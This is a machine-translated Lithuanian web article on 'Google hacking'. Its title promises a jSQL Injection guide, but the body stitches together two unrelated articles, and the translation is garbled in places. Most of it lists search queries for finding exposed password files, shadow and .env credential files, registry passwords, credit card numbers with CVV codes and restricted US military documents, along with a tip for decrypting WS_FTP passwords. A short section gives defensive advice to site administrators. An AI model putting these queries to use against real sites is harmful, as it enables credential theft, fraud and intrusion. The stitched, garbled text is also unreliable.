Instrukcijos, kaip naudoti „jSQL Injection“, daugiafunkcį įrankį, skirtą SQL injekcijoms rasti ir naudoti „Kali Linux“. Mažai žinomų „Google“ funkcijų naudojimas norint rasti paslėptus produktus inurl paskelbimo peržiūros php id

Įsilaužimas naudojant „Google“.

Aleksandras Antipovas

Google paieškos sistema (www.google.com) suteikia daug paieškos parinkčių. Visos šios funkcijos yra neįkainojamas paieškos įrankis naujam internetui besinaudojančiam vartotojui ir tuo pačiu dar galingesnis invazijos ir naikinimo ginklas piktų ketinimų turinčių žmonių rankose, įskaitant ne tik programišius, bet ir ne kompiuterinius nusikaltėlius bei net teroristai.
(9475 peržiūros per 1 savaitę)


Denisas Barankovas
denisNOSPAMixi.ru

Dėmesio: Šis straipsnis nėra veiksmų vadovas. Šis straipsnis buvo parašytas jums, WEB serverio administratoriams, kad prarastumėte klaidingą jausmą, kad esate saugūs, ir jūs pagaliau suprastumėte šio informacijos gavimo būdo klastingumą ir imtumėte saugoti savo svetainę.

Įvadas

Pavyzdžiui, aš radau 1670 puslapių per 0,14 sekundės!

2. Įveskite kitą eilutę, pavyzdžiui:

inurl:"auth_user_file.txt"

šiek tiek mažiau, bet to jau pakanka nemokamam atsisiuntimui ir slaptažodžio atspėjimui (naudojant tą patį John The Ripper). Žemiau pateiksiu dar keletą pavyzdžių.

Taigi, jūs turite suprasti, kad Google paieškos sistema aplankė daugumą interneto svetainių ir talpino juose esančią informaciją. Ši talpykloje saugoma informacija leidžia gauti informaciją apie svetainę ir jos turinį be tiesioginio prisijungimo prie svetainės, tik įsigilinus į informaciją, kuri saugoma Google viduje. Be to, jei informacijos svetainėje nebėra, talpykloje esanti informacija vis tiek gali būti išsaugota. Viskas, ko jums reikia šiam metodui, yra žinoti kai kuriuos „Google“ raktinius žodžius. Ši technika vadinama „Google Hacking“.

Informacija apie Google Hacking pirmą kartą pasirodė Bugtruck adresų sąraše prieš 3 metus. 2001 metais šią temą iškėlė prancūzų studentas. Čia yra nuoroda į šį laišką http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Jame pateikiami pirmieji tokių užklausų pavyzdžiai:

1) Rodyklė /admin
2) /slaptažodžio rodyklė
3) /pašto rodyklė
4) Indeksas / +banques +filetype:xls (Prancūzijai...)
5) Rodyklė / +passwd
6) Rodyklė / slaptažodis.txt

Ši tema angliškai skaitomoje interneto dalyje bangas sukėlė visai neseniai: po Johnny Longo straipsnio, paskelbto 2004 m. gegužės 7 d. Jei norite išsamesnio „Google Hacking“ tyrimo, patariu apsilankyti šio autoriaus svetainėje http://johnny.ihackstuff.com. Šiame straipsnyje aš tik noriu jus atnaujinti.

Kas gali tai naudoti:
– Žurnalistai, šnipai ir visi tie, kurie mėgsta kišti nosį į kitų reikalus, gali tai panaudoti kaltinančių įrodymų paieškai.
- įsilaužėliai, ieškantys įsilaužimui tinkamų taikinių.

Kaip veikia Google.

Norėdami tęsti pokalbį, leiskite priminti kai kuriuos raktinius žodžius, naudojamus „Google“ užklausose.

Ieškokite naudodami + ženklą

„Google“ iš paieškų neįtraukia žodžių, kurie, jos nuomone, yra nesvarbūs. Pavyzdžiui, klausiamieji žodžiai, prielinksniai ir straipsniai anglų kalba: pavyzdžiui yra, iš, kur. Atrodo, kad rusų kalba Google visus žodžius laiko svarbiais. Jei žodis neįtraukiamas į paiešką, Google apie tai rašo. Kad Google pradėtų ieškoti puslapių su šiais žodžiais, prieš žodį reikia pridėti + ženklą be tarpo. Pavyzdžiui:

tūzas +pagrindas

Ieškokite naudodami ženklą -

Jei „Google“ randa daug puslapių, iš kurių reikia išskirti tam tikros temos puslapius, galite priversti „Google“ ieškoti tik tų puslapių, kuriuose nėra tam tikrų žodžių. Norėdami tai padaryti, turite nurodyti šiuos žodžius, padėdami ženklą prieš kiekvieną – be tarpo prieš žodį. Pavyzdžiui:

žvejyba – degtinė

Ieškokite naudodami ~

Galbūt norėsite ieškoti ne tik nurodyto žodžio, bet ir jo sinonimų. Norėdami tai padaryti, prieš žodį įveskite simbolį ~.

Tikslios frazės radimas naudojant dvigubas kabutes

„Google“ kiekviename puslapyje ieško visų žodžių, kuriuos įrašėte užklausos eilutėje, atvejų ir jai nerūpi santykinė žodžių padėtis, jei visi nurodyti žodžiai yra puslapyje vienu metu (tai yra numatytasis veiksmas). Norėdami rasti tikslią frazę, turite ją įdėti į kabutes. Pavyzdžiui:

"knygos galas"

Norėdami turėti bent vieną iš nurodytų žodžių, turite aiškiai nurodyti loginę operaciją: ARBA. Pavyzdžiui:

knygų sauga ARBA apsauga

Be to, paieškos juostoje galite naudoti ženklą *, kad nurodytumėte bet kurį žodį ir. reprezentuoti bet kokį personažą.

Žodžių paieška naudojant papildomus operatorius

Yra paieškos operatoriai, nurodyti paieškos eilutėje tokiu formatu:

operatorius:paieškos_terminas

Tarpai šalia dvitaškio nereikalingi. Jei po dvitaškio įterpsite tarpą, pamatysite klaidos pranešimą, o prieš jį Google naudos juos kaip įprastą paieškos eilutę.
Yra papildomų paieškos operatorių grupės: kalbos - nurodykite, kuria kalba norite matyti rezultatą, data - apribokite paskutinių trijų, šešių ar 12 mėnesių rezultatus, įvykiai - nurodykite, kurioje dokumento vietoje reikia ieškoti eilutė: visur, pavadinime, URL, domenai - ieškokite nurodytoje svetainėje arba, atvirkščiai, pašalinkite ją iš paieškos; saugi paieška - blokuoja svetaines, kuriose yra nurodyto tipo informacija, ir pašalina jas iš paieškos rezultatų puslapių.
Tuo pačiu metu kai kurie operatoriai nereikalauja papildomo parametro, pavyzdžiui, užklausa „cache:www.google.com“ gali būti vadinama visaverte paieškos eilute, o kai kurie raktiniai žodžiai, priešingai, reikalauja paieškos. žodis, pavyzdžiui, „site:www. google.com pagalba“. Atsižvelgdami į mūsų temą, pažvelkime į šiuos operatorius:

operatorius

apibūdinimas

Reikia papildomo parametro?

ieškoti tik paieškos_termine nurodytoje svetainėje

ieškoti tik dokumentuose, kurių tipas yra paieškos_terminas

rasti puslapius, kurių pavadinime yra paieškos terminas

rasti puslapius, kurių pavadinime yra visi paieškos termino žodžiai

rasti puslapius, kurių adresu yra žodis paieškos_terminas

rasti puslapius, kuriuose yra visi paieškos_termino žodžiai

Operatorius „site:“ apriboja paiešką tik nurodytoje svetainėje, o jūs galite nurodyti ne tik domeno pavadinimą, bet ir IP adresą. Pavyzdžiui, įveskite:

failo tipo operatorius: apriboja paiešką iki konkretaus failo tipo. Pavyzdžiui:

Straipsnio paskelbimo datos „Google“ gali ieškoti 13 skirtingų failų formatų:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • „Lotus WordPro“ (lwp)
  • „MacWrite“ (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • „Microsoft Works“ (wks, wps, wdb)
  • Microsoft Write (rašytinis)
  • Raiškiojo teksto formatas (rtf)
  • Shockwave Flash (swf)
  • Tekstas (ans, txt)

Nuorodos operatorius: rodo visus puslapius, nukreipiančius į nurodytą puslapį.
Tikriausiai visada įdomu sužinoti, kiek vietų internete apie tave žino. Pabandykime:

Talpyklos operatorius: rodo „Google“ talpykloje esančios svetainės versiją, tokią, kokia ji atrodė paskutinį kartą, kai „Google“ lankėsi tame puslapyje. Paimkime bet kurią dažnai besikeičiančią svetainę ir pažiūrėkime:

intitle operatorius: ieško nurodyto žodžio puslapio pavadinime. Operatorius allintitle: yra plėtinys – jis ieško visų nurodytų kelių žodžių puslapio pavadinime. Palyginti:

pavadinime: skrydis į Marsą
intitle:flight intitle:on intitle:mars
allintitle: skrydis į Marsą

Inurl operatorius: priverčia „Google“ rodyti visus puslapius, kurių URL yra nurodyta eilutė. allinurl operatorius: ieško visų žodžių URL. Pavyzdžiui:

allinurl:acid acid_stat_alerts.php

Ši komanda ypač naudinga tiems, kurie neturi SNORT – bent jau jie gali pamatyti, kaip tai veikia tikroje sistemoje.

Įsilaužimo metodai naudojant „Google“.

Taigi, mes išsiaiškinome, kad naudojant aukščiau išvardytų operatorių ir raktinių žodžių derinį, kiekvienas gali rinkti reikiamą informaciją ir ieškoti pažeidžiamumų. Šie metodai dažnai vadinami „Google Hacking“.

Svetainės žemėlapis

Norėdami išvardyti visas nuorodas, kurias „Google“ rado svetainėje, galite naudoti operatorių site:. Paprastai puslapiai, kurie yra dinamiškai kuriami naudojant scenarijus, nėra indeksuojami naudojant parametrus, todėl kai kurios svetainės naudoja ISAPI filtrus, kad nuorodos būtų ne formos /article.asp?num=10&dst=5 , o su pasviraisiais brūkšniais /article/abc/num/ 10/ dst/5. Tai daroma taip, kad svetainę paprastai indeksuotų paieškos sistemos.

Pabandykime:

svetainė: www.whitehouse.gov whitehouse

„Google“ mano, kad kiekviename svetainės puslapyje yra žodis „whitehouse“. Tai mes naudojame norėdami gauti visus puslapius.
Taip pat yra supaprastinta versija:

svetainė: whitehouse.gov

Ir geriausia yra tai, kad bendražygiai iš whitehouse.gov net nežinojo, kad mes žiūrėjome į jų svetainės struktūrą ir net žiūrėjome į talpykloje esančius puslapius, kuriuos atsisiuntė Google. Tai gali būti naudojama norint ištirti svetainių struktūrą ir peržiūrėti turinį, kol kas lieka nepastebėtas.

Peržiūrėkite kataloguose esančių failų sąrašą

WEB serveriai gali rodyti serverių katalogų sąrašus, o ne įprastus HTML puslapius. Paprastai tai daroma siekiant užtikrinti, kad vartotojai pasirinktų ir atsisiųstų konkrečius failus. Tačiau daugeliu atvejų administratoriai neketina rodyti katalogo turinio. Taip nutinka dėl neteisingos serverio konfigūracijos arba dėl to, kad kataloge nėra pagrindinio puslapio. Dėl to įsilaužėlis turi galimybę kataloge rasti ką nors įdomaus ir panaudoti tai savo tikslams. Norint rasti visus tokius puslapius, pakanka pastebėti, kad juose visuose yra žodžiai: index of. Tačiau kadangi žodžių rodyklėje yra ne tik tokie puslapiai, turime patikslinti užklausą ir atsižvelgti į raktinius žodžius pačiame puslapyje, todėl tokios užklausos kaip:

intitle:index.of pirminio katalogo
intitle:vardo dydžio rodyklė

Kadangi dauguma katalogų sąrašų yra tyčiniai, jums gali būti sunku pirmą kartą rasti netinkamus įrašus. Bet bent jau galite naudoti sąrašus, kad nustatytumėte WEB serverio versiją, kaip aprašyta toliau.

WEB serverio versijos gavimas.

Žiniatinklio serverio versiją visada pravartu prieš pradedant bet kokią įsilaužėlių ataką. Vėlgi, „Google“ dėka šią informaciją galite gauti neprisijungę prie serverio. Jei atidžiai pažvelgsite į katalogų sąrašą, pamatysite, kad ten rodomas WEB serverio pavadinimas ir jo versija.

Apache1.3.29 – ProXad serveris trf296.free.fr 80 prievadas

Patyręs administratorius gali pakeisti šią informaciją, tačiau, kaip taisyklė, tai tiesa. Taigi, norint gauti šią informaciją, pakanka išsiųsti užklausą:

intitle:index.of server.at

Norėdami gauti informaciją apie konkretų serverį, paaiškiname užklausą:

intitle:index.of server.at site:ibm.com

Arba atvirkščiai, ieškome serverių, kuriuose veikia tam tikra serverio versija:

intitle:index.of Apache/2.0.40 Server at

Šią techniką įsilaužėlis gali naudoti norėdamas surasti auką. Pavyzdžiui, jei jis turi tam tikros WEB serverio versijos išnaudojimą, jis gali jį rasti ir išbandyti esamą išnaudojimą.

Taip pat galite gauti serverio versiją peržiūrėdami puslapius, kurie yra įdiegti pagal numatytuosius nustatymus diegiant naujausią WEB serverio versiją. Pavyzdžiui, norėdami pamatyti Apache 1.2.6 bandomąjį puslapį, tiesiog įveskite

intitle:Test.Page.for.Apache it.worked!

Be to, kai kurios operacinės sistemos iš karto įdiegia ir paleidžia WEB serverį diegimo metu. Tačiau kai kurie vartotojai apie tai net nežino. Natūralu, kad jei matote, kad kažkas nepašalino numatytojo puslapio, logiška manyti, kad kompiuteris nebuvo visiškai pritaikytas ir gali būti pažeidžiamas atakų.

Pabandykite ieškoti IIS 5.0 puslapių

allintitle: Sveiki atvykę į Windows 2000 interneto paslaugas

IIS atveju galite nustatyti ne tik serverio versiją, bet ir Windows versiją bei pakeitimų paketą.

Kitas būdas nustatyti WEB serverio versiją yra ieškoti vadovų (pagalbos puslapių) ir pavyzdžių, kurie gali būti įdiegti svetainėje pagal numatytuosius nustatymus. Piratai rado nemažai būdų, kaip naudoti šiuos komponentus, kad gautų privilegijuotą prieigą prie svetainės. Štai kodėl jūs turite pašalinti šiuos komponentus gamybos vietoje. Jau nekalbant apie tai, kad šių komponentų buvimas gali būti naudojamas norint gauti informaciją apie serverio tipą ir jo versiją. Pavyzdžiui, suraskime apache vadovą:

inurl: rankinis apache direktyvų moduliai

„Google“ naudojimas kaip CGI skaitytuvas.

CGI skaitytuvas arba WEB skaitytuvas yra įrankis, skirtas ieškoti pažeidžiamų scenarijų ir programų aukos serveryje. Šios komunalinės paslaugos turi žinoti, ko ieškoti, todėl jos turi visą pažeidžiamų failų sąrašą, pavyzdžiui:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Kiekvieną iš šių failų galime rasti naudodami „Google“, papildomai naudodami žodžius „index of“ arba „inurl“ su failo pavadinimu paieškos juostoje: galime rasti svetainių su pažeidžiamais scenarijais, pavyzdžiui:

allinurl:/random_banner/index.cgi

Naudodamas papildomas žinias, įsilaužėlis gali išnaudoti scenarijaus pažeidžiamumą ir panaudoti šį pažeidžiamumą, kad priverstų scenarijų išleisti bet kokį serveryje saugomą failą. Pavyzdžiui, slaptažodžio failas.

Kaip apsisaugoti nuo „Google“ įsilaužimo. 1. Neskelbti svarbių duomenų WEB serveryje.

Net jei duomenis paskelbėte laikinai, galite juos pamiršti arba kas nors turės laiko surasti ir paimti šiuos duomenis prieš juos ištrindamas. Nedaryk to. Yra daug kitų duomenų perdavimo būdų, kurie apsaugo juos nuo vagystės.

2. Patikrinkite savo svetainę.

Norėdami ištirti svetainę, naudokite aprašytus metodus. Reguliariai tikrinkite savo svetainę, ar nėra naujų metodų, kurie rodomi svetainėje http://johnny.ihackstuff.com. Atminkite, kad jei norite automatizuoti savo veiksmus, turite gauti specialų „Google“ leidimą. Jei atidžiai perskaitysite http://www.google.com/terms_of_service.html, tada pamatysite frazę: Negalite siųsti jokių automatinių užklausų į „Google“ sistemą be aiškaus išankstinio „Google“ leidimo.

3. Jums gali nereikėti „Google“, kad indeksuotų jūsų svetainę ar jos dalį.

„Google“ leidžia iš savo duomenų bazės pašalinti nuorodą į jūsų svetainę ar jos dalį, taip pat pašalinti puslapius iš talpyklos. Be to, galite uždrausti vaizdų paiešką savo svetainėje, uždrausti trumpus puslapių fragmentus rodyti paieškos rezultatuose. Visos svetainės ištrynimo galimybės aprašytos puslapyje http://www.google.com/remove.html. Norėdami tai padaryti, turite patvirtinti, kad tikrai esate šios svetainės savininkas, arba įterpti žymas į puslapį arba

4. Naudokite robots.txt

Yra žinoma, kad paieškos sistemos žiūri į robots.txt failą, esantį svetainės šaknyje, ir neindeksuoja tų dalių, kurios pažymėtos žodžiu Disallow. Tai galite naudoti norėdami išvengti, kad dalis svetainės būtų indeksuojama. Pavyzdžiui, kad visa svetainė nebūtų indeksuojama, sukurkite failą robots.txt, kuriame yra dvi eilutės:

Vartotojo atstovas: *
Neleisti: /

Kas dar atsitinka

Kad gyvenimas jums neatrodytų kaip medus, pagaliau pasakysiu, kad yra svetainių, kurios stebi tuos žmones, kurie aukščiau aprašytais metodais ieško spragų scenarijuose ir WEB serveriuose. Tokio puslapio pavyzdys yra

Taikymas.

Šiek tiek saldus. Išbandykite kai kuriuos iš šių dalykų patys:

1. #mysql dump filetype:sql – ieškokite mySQL duomenų bazės iškeltinių
2. Prieglobos pažeidžiamumo suvestinės ataskaita – parodys, kokių pažeidžiamumų rado kiti žmonės
3. phpMyAdmin veikia inurl:main.php – tai privers uždaryti valdymą per phpmyadmin skydelį
4. ne platinti konfidencialiai
5. Išsamios užklausos valdymo medžio serverio kintamieji
6. Bėgimas vaiko režimu
7. Šią ataskaitą sukūrė WebLog
8. intitle:index.of cgiirc.config
9. filetype:conf inurl:firewall -intitle:cvs – gal kam reikia ugniasienės konfigūracijos failų? :)
10. title:finansų indeksas.xls – hmm....
11. intitle: dbconvert.exe pokalbių indeksas – icq pokalbių žurnalai
12.intext:Tobias Oetiker eismo analizė
13. intitle: Naudojimo statistika, sukurta Webalizer
14. pavadinimas: išplėstinės žiniatinklio statistikos statistika
15. intitle:index.of ws_ftp.ini – ws ftp config
16. inurl:ipsec.secrets saugo bendras paslaptis – slaptas raktas – geras radinys
17. inurl:main.php Sveiki atvykę į phpMyAdmin
18. inurl:server-info Apache serverio informacija
19. site:edu admin pažymiai
20. ORA-00921: netikėta SQL komandos pabaiga – kelių gavimas
21. intitle:index.of trilian.ini
22. title: Index of pwd.db
23.intitle:žmonių rodyklė.lst
24. intitle:index.of master.passwd
25.inurl:passlist.txt
26. intitle: .mysql_history indeksas
27. intitle:index of intext:globals.inc
28. title:index.of administrators.pwd
29. title:Index.of etc shadow
30.intitle:index.ofsecring.pgp
31. inurl:config.php dbuname dbpass
32. inurl:perform filetype:ini

  • „Įsilaužimas su Google“
  • Mokymo centras "Informzashita" http://www.itsecurity.ru - pirmaujantis specializuotas centras informacijos saugumo mokymo srityje (Maskvos švietimo komiteto licencija Nr. 015470, valstybinė akreditacija Nr. 004251). Vienintelis įgaliotas Internet Security Systems ir Clearswift mokymo centras Rusijoje ir NVS šalyse. Microsoft autorizuotas mokymo centras (saugos specializacija). Mokymo programos derinamos su Rusijos valstybine technine komisija FSB (FAPSI). Mokymo pažymėjimai ir valstybiniai kvalifikacijos kėlimo dokumentai.

    SoftKey yra unikali paslauga pirkėjams, kūrėjams, prekiautojams ir susijusiems partneriams. Be to, tai viena geriausių internetinių programinės įrangos parduotuvių Rusijoje, Ukrainoje, Kazachstane, kuri klientams siūlo platų prekių asortimentą, daugybę atsiskaitymo būdų, operatyvų (dažnai momentinį) užsakymų apdorojimą, užsakymo eigos sekimą asmeninėje skiltyje, įvairius parduotuvės ir gamintojų nuolaidos BY.

    Privačių duomenų gavimas ne visada reiškia įsilaužimą – kartais jie skelbiami viešai. Google nustatymų išmanymas ir šiek tiek išradingumo leis rasti daug įdomių dalykų – nuo ​​kredito kortelių numerių iki FTB dokumentų.

    ĮSPĖJIMAS Visa informacija pateikiama tik informaciniais tikslais. Nei redaktoriai, nei autorius neatsako už bet kokią galimą žalą, padarytą dėl šio straipsnio medžiagos.

    Šiandien viskas prijungta prie interneto, mažai rūpinamasi prieigos ribojimu. Todėl daugelis privačių duomenų tampa paieškos sistemų grobiu. Robotai vorai nebeapsiriboja vien tinklalapiais, o indeksuoja visą internete esantį turinį ir nuolat į savo duomenų bazes įtraukia neviešą informaciją. Sužinoti šias paslaptis lengva – tereikia žinoti, kaip apie jas paklausti.

    Ieškau failų

    Pajėgiose rankose „Google“ greitai suras viską, ko nerandama internete, pavyzdžiui, asmeninę informaciją ir oficialiam naudojimui skirtas bylas. Jie dažnai paslėpti kaip raktas po kilimėliu: realių prieigos apribojimų nėra, duomenys tiesiog guli svetainės gale, kur nenuveda jokios nuorodos. Standartinėje „Google“ žiniatinklio sąsajoje pateikiami tik pagrindiniai išplėstinės paieškos nustatymai, tačiau ir jų pakaks.

    Galite apriboti „Google“ paiešką iki tam tikro tipo failų naudodami du operatorius: failo tipas ir išorinis . Pirmasis nurodo formatą, kurį paieškos variklis nustatė pagal failo pavadinimą, antrasis nurodo failo plėtinį, neatsižvelgiant į jo vidinį turinį. Ieškant abiem atvejais tereikia nurodyti plėtinį. Iš pradžių ext operatorių buvo patogu naudoti tais atvejais, kai failas neturėjo konkrečių formato savybių (pavyzdžiui, ieškant ini ir cfg konfigūracijos failų, kuriuose galėjo būti bet kas). Dabar Google algoritmai pasikeitė, o tarp operatorių nesimato jokio skirtumo – dažniausiai rezultatai būna vienodi.


    Rezultatų filtravimas

    Pagal numatytuosius nustatymus „Google“ ieško žodžių ir apskritai visų įvestų simbolių visuose indeksuotų puslapių failuose. Galite apriboti paieškos sritį pagal aukščiausio lygio domeną, konkrečią svetainę arba pagal paieškos sekos vietą pačiuose failuose. Pirmosioms dviem parinktims naudokite svetainės operatorių, po kurio nurodykite domeno arba pasirinktos svetainės pavadinimą. Trečiuoju atveju visas operatorių rinkinys leidžia ieškoti informacijos paslaugų laukuose ir metaduomenyse. Pavyzdžiui, allinurl ras nurodytą pačių nuorodų turinyje, allinachor - tekste su žyma , allintitle – puslapių pavadinimuose, allintext – puslapių turinyje.

    Kiekvienam operatoriui yra lengva versija su trumpesniu pavadinimu (be priešdėlio visi). Skirtumas tas, kad allinurl ras nuorodas su visais žodžiais, o inurl – tik su pirmuoju iš jų. Antrieji ir paskesni užklausos žodžiai gali būti rodomi bet kurioje tinklalapio vietoje. Inurl operatorius taip pat skiriasi nuo kito operatoriaus, turinčio panašią reikšmę – site. Pirmoji taip pat leidžia rasti bet kokią simbolių seką nuorodoje į ieškomą dokumentą (pvz., /cgi-bin/), kuri plačiai naudojama ieškant komponentų su žinomomis pažeidžiamumu.

    Pabandykime tai praktiškai. Paimame allintext filtrą ir pateikiame užklausą kredito kortelių, kurių galiojimas baigsis tik po dvejų metų (arba kai jų savininkai pavargs visus maitinti), numerių ir patvirtinimo kodų sąrašą.

    Allintext: kortelės numerio galiojimo data /2017 cvv

    Kai perskaitote naujienas, kad jaunas įsilaužėlis „įsilaužė į Pentagono ar NASA serverius“, pavogdamas įslaptintą informaciją, dažniausiai kalbame apie tokią pagrindinę „Google“ naudojimo techniką. Tarkime, mus domina NASA darbuotojų sąrašas ir jų kontaktinė informacija. Žinoma, tokį sąrašą galima rasti elektronine forma. Patogumo dėlei arba dėl priežiūros jis gali būti ir pačioje organizacijos svetainėje. Logiška, kad šiuo atveju nuorodų į jį nebus, nes jis skirtas vidiniam naudojimui. Kokie žodžiai gali būti tokiame faile? Mažiausiai - laukas „adresas“. Išbandyti visas šias prielaidas lengva.


    Inurl:nasa.gov failo tipas:xlsx "adresas"


    Mes naudojame biurokratiją

    Tokie radiniai yra malonus prisilietimas. Išties solidų laimikį suteikia išsamesnės žiniatinklio valdytojams skirtos Google operatorių žinios, pats tinklas ir ieškomo struktūros ypatumai. Žinodami išsamią informaciją, galite lengvai filtruoti rezultatus ir patikslinti reikalingų failų savybes, kad gautumėte tikrai vertingų duomenų. Juokinga, kad čia į pagalbą ateina biurokratija. Jis gamina standartines formules, kurios yra patogios ieškant slaptos informacijos, netyčia nutekėjusios į internetą.

    Pavyzdžiui, platinimo pareiškimo antspaudas, kurio reikalauja JAV Gynybos departamentas, reiškia standartizuotus dokumento platinimo apribojimus. Raidė A žymi viešus pranešimus, kuriuose nėra nieko slapto; B – skirtas tik vidiniam naudojimui, C – griežtai konfidencialus ir taip iki F. Atskirai išsiskiria raidė X, kuri žymi ypač vertingą aukščiausio lygio valstybės paslaptį reprezentuojančią informaciją. Tegul tie, kurie turi tai daryti budėdami, ieško tokių dokumentų, o mes apsiribosime failais su raide C. Pagal DoDI direktyvą 5230.24 šis žymėjimas priskiriamas dokumentams, kuriuose aprašomos svarbiausios technologijos, kurioms taikoma eksporto kontrolė. . Tokią kruopščiai saugomą informaciją galite rasti aukščiausio lygio domain.mil svetainėse, skirtose JAV armijai.

    "PLATINIMAS C" inurl:navy.mil

    Labai patogu, kad .mil domene yra tik JAV Gynybos departamento ir jo sutartinių organizacijų svetainės. Paieškos rezultatai su domeno apribojimu yra ypač švarūs, o pavadinimai kalba patys už save. Taip ieškoti rusiškų paslapčių praktiškai nenaudinga: domains.ru ir.rf viešpatauja chaosas, o daugelio ginklų sistemų pavadinimai skamba kaip botaniniai (PP „Kiparis“, savaeigiai ginklai „Akatsia“) ar net pasakiškai ( TOS „Buratino“).


    Atidžiai išnagrinėję bet kurį dokumentą iš svetainės, esančios .mil domene, galite pamatyti kitus žymeklius, kad patikslintumėte paiešką. Pavyzdžiui, nuoroda į eksporto apribojimus „Sec 2751“, kuri taip pat patogi ieškant įdomios techninės informacijos. Retkarčiais jis pašalinamas iš oficialių svetainių, kuriose jis kadaise pasirodė, todėl, jei negalite sekti įdomios nuorodos paieškos rezultatuose, naudokite „Google“ talpyklą (talpyklos operatorių) arba interneto archyvo svetainę.

    Lipimas į debesis

    Be netyčia išslaptintų vyriausybės dokumentų, „Google“ talpykloje retkarčiais pasirodo nuorodos į asmeninius failus iš „Dropbox“ ir kitų duomenų saugojimo paslaugų, kurios sukuria „privačias“ nuorodas į viešai paskelbtus duomenis. Dar blogiau naudojant alternatyvias ir savadarbes paslaugas. Pavyzdžiui, ši užklausa randa duomenis apie visus „Verizon“ klientus, kurie turi įdiegtą FTP serverį ir aktyviai naudoja maršruto parinktuvą.

    Allinurl:ftp://verizon.net

    Tokių protingų žmonių dabar yra daugiau nei keturiasdešimt tūkstančių, o 2015 metų pavasarį jų buvo kur kas daugiau. Vietoj Verizon.net galite pakeisti bet kurio žinomo teikėjo pavadinimą ir kuo jis garsesnis, tuo didesnis sugautas kiekis. Per integruotą FTP serverį galite matyti failus išoriniame saugojimo įrenginyje, prijungtame prie maršrutizatoriaus. Paprastai tai yra NAS nuotoliniam darbui, asmeninis debesis arba koks nors lygiavertis failų atsisiuntimas. Visas tokios laikmenos turinys yra indeksuojamas Google ir kitų paieškos sistemų, todėl išoriniuose diskuose saugomus failus galite pasiekti naudodami tiesioginę nuorodą.

    Žiūrint į konfigūracijas

    Prieš plačiai perkeliant į debesį, paprasti FTP serveriai buvo nuotolinė saugykla, kuri taip pat turėjo daug pažeidžiamumų. Daugelis jų yra aktualūs ir šiandien. Pavyzdžiui, populiari programa WS_FTP Professional saugo konfigūracijos duomenis, vartotojų abonementus ir slaptažodžius faile ws_ftp.ini. Jį lengva rasti ir perskaityti, nes visi įrašai išsaugomi teksto formatu, o slaptažodžiai užšifruojami naudojant Triple DES algoritmą po minimalaus užmaskavimo. Daugumoje versijų pakanka tiesiog atmesti pirmąjį baitą.

    Tokius slaptažodžius lengva iššifruoti naudojant WS_FTP slaptažodžio iššifravimo įrankį arba nemokamą žiniatinklio paslaugą.

    Kalbėdami apie įsilaužimą į savavališką svetainę, jie paprastai reiškia slaptažodžio gavimą iš TVS arba el. prekybos programų žurnalų ir konfigūracijos failų atsarginių kopijų. Jei žinote tipinę jų struktūrą, galite lengvai nurodyti raktinius žodžius. Tokios eilutės kaip ws_ftp.ini yra labai dažnos. Pavyzdžiui, Drupal ir PrestaShop visada yra vartotojo identifikatorius (UID) ir atitinkamas slaptažodis (pwd), o visa informacija saugoma failuose su plėtiniu .inc. Jų galite ieškoti taip:

    "pwd=" "UID=" ext:inc

    DBVS slaptažodžių atskleidimas

    SQL serverių konfigūracijos failuose naudotojų vardai ir el. pašto adresai saugomi aiškiu tekstu, o jų MD5 maišos rašomos vietoj slaptažodžių. Griežtai tariant, jų iššifruoti neįmanoma, tačiau galite rasti atitikmenį tarp žinomų maišos ir slaptažodžių porų.

    Vis dar yra DBVS, kurios net nenaudoja slaptažodžių maišos. Bet kurio iš jų konfigūracijos failus galima tiesiog peržiūrėti naršyklėje.

    Intext:DB_PASSWORD failo tipas:env

    Atsiradus „Windows“ serveriams, konfigūracijos failų vietą iš dalies užėmė registras. Lygiai taip pat galite ieškoti jo šakose, kaip failo tipą naudodami reg. Pavyzdžiui, taip:

    Failo tipas:reg HKEY_CURRENT_USER "Slaptažodis"=

    Nepamirškime to, kas akivaizdu

    Kartais įslaptintą informaciją galima pasiekti naudojant duomenis, kurie buvo netyčia atidaryti ir pateko į Google dėmesį. Idealus variantas yra rasti slaptažodžių sąrašą įprastu formatu. Tik beviltiški žmonės gali saugoti paskyros informaciją tekstiniame faile, „Word“ dokumente ar „Excel“ skaičiuoklėje, tačiau jų visada yra pakankamai.

    Failo tipas:xls inurl:slaptažodis

    Viena vertus, yra daug priemonių užkirsti kelią tokiems incidentams. Būtina nurodyti tinkamas prieigos teises htaccess, pataisyti TVS, nenaudoti kairiarankių scenarijų ir uždaryti kitas skyles. Taip pat yra failas su robots.txt išimčių sąrašu, kuris draudžia paieškos sistemoms indeksuoti jame nurodytus failus ir katalogus. Kita vertus, jei kokiame nors serveryje robots.txt struktūra skiriasi nuo standartinės, tuomet iškart tampa aišku, ką jame bandoma paslėpti.

    Prieš katalogų ir failų sąrašą bet kurioje svetainėje pateikiama standartinė rodyklė. Kadangi aptarnavimo tikslais jis turi būti nurodytas pavadinime, tikslinga apriboti paiešką tik intitle operatoriumi. Įdomūs dalykai yra /admin/, /personal/, /etc/ ir net /secret/ kataloguose.

    Sekite naujienas

    Aktualumas čia itin svarbus: senos spragos uždaromos labai lėtai, tačiau Google ir jos paieškos rezultatai nuolat keičiasi. Netgi skiriasi „paskutinės sekundės“ filtras (&tbs=qdr:s užklausos URL pabaigoje) ir „realiojo laiko“ filtras (&tbs=qdr:1).

    „Google“ netiesiogiai nurodo ir paskutinio failo atnaujinimo datos laiko intervalą. Per grafinę žiniatinklio sąsają galite pasirinkti vieną iš standartinių laikotarpių (valanda, diena, savaitė ir kt.) arba nustatyti datos intervalą, tačiau šis metodas netinka automatizavimui.

    Iš adreso juostos išvaizdos galite tik spėlioti, kaip apriboti rezultatų išvestį naudojant &tbs=qdr: konstrukciją. Raidė y po jos nustato vienerių metų ribą (&tbs=qdr:y), m rodo paskutinio mėnesio rezultatus, w – savaitės, d – praėjusios dienos, h – paskutinės valandos, n – už minutę, o už s - duok man sek. Naujausi rezultatai, kuriuos ką tik paskelbė „Google“, randami naudojant filtrą &tbs=qdr:1 .

